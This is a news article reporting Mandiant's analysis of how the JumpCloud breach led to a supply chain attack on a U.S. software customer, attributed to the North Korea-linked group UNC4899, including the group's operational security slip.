Mandiant: JumpCloud breach led to supply chain attack

Mandiant discovered a supply chain attack against a U.S. software company that stemmed from last month's data breach at JumpCloud.

JumpCloud earlier this month disclosed it had been breached by a nation-state threat actor through a spear phishing campaign. JumpCloud CISO Robert Phan said in a blog post that the threat actor compromised the cloud provider's commands framework and used it for malicious data injection in "extremely targeted" attacks against a small number of customers. JumpCloud first issued an advisory on July 5 for a mandatory API key rotation in response to an "ongoing incident," though it did not say at the time that the company's network had been breached.

In a blog post Monday, Mandiant shed additional light on the JumpCloud breach and subsequent attacks against its customers. The Google Cloud-owned infosec firm said it responded to a supply chain attack this month against an unnamed U.S. software company and JumpCloud customer.

"We believe the compromise ultimately began as a result of a sophisticated spear phishing campaign aimed at JumpCloud, a zero-trust directory platform service used for identity and access management," Mandiant researchers wrote in the blog post.

Mandiant said it identified a malicious script on June 27 that had been executed by a JumpCloud agent at the U.S. software company. "Initial access was gained by compromising JumpCloud and inserting malicious code into their commands framework," the post said. "In at least one instance, the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent."

The Ruby script was designed to download and execute a second payload. Mandiant discovered that within 24 hours of gaining access to the customer's environment, the threat actor had established persistent access through backdoors and plist files while removing the initial payload and second-stage backdoor.

Mandiant attributed the supply chain attack to UNC4899, a Democratic People's Republic of Korea (DPRK) "nexus actor" that has a track record for targeting cryptocurrency companies. Mandiant researchers assessed with high confidence that UNC4899 is a cryptocurrency-focused group within the DPRK's intelligence agency known as the Reconnaissance General Bureau (RGB).

In this supply chain attack, Mandiant observed the attackers "targeting MacOS keychains and reconnaissance data associated with executives and internal security teams." The vendor added that UNC4899 "likely corresponds" to DPRK-affiliated advanced persistent threat group TraderTraitor, which CISA profiled in an advisory last year.

SentinelOne last Thursday attributed the JumpCloud breach to a DPRK state-sponsored actor. JumpCloud published an update the same day stating that CrowdStrike, the company's incident response provider, identified and confirmed the threat actor was affiliated with DPRK. JumpCloud also said fewer than five customers and 10 devices total were affected by the resulting attacks.

In its report, Mandiant noted that UNC4899 committed a crucial operational security "fumble" in its recent attacks. The researchers said RGB-connected threat actors typically deploy operational relay boxes (ORBs) for proxy infrastructure and use L2TP IPsec tunnels and commercial VPNs, such as ExpressVPN, NordVPN and TorGuard, to obscure their addresses.

However, Mandiant noted that those VPNs "occasionally fail" and reveal source IP addresses. In fact, researchers said they observed UNC4899 connecting directly to an attacker-controlled ORB from its subnet address in the Ryugyong-dong district of Pyongyang, North Korea.

"Additionally we observed the DPRK threat actor log directly into a Pyongyang IP, from one of their jump boxes," Mandiant said in the blog post. "Our evidence supports that this was an OPSEC slip up since the connection to the North Korean netblock was short-lived."

Mandiant also warned of increasing supply chain threats from DPRK threat groups. Researchers said the JumpCloud breach, as well as the 3CX supply chain compromise earlier this year, have demonstrated the "cascading effects" of breaching service providers to gain access to downstream customers.

"Both operations have suspected ties to financially motivated DPRK actors, suggesting that DPRK operators are implementing supply chain TTPs [tactics, techniques and procedures] to target select entities as part of increased efforts to target cryptocurrency and fintech-related assets," Mandiant said.

Rob Wright is a longtime technology reporter who lives in the Boston area.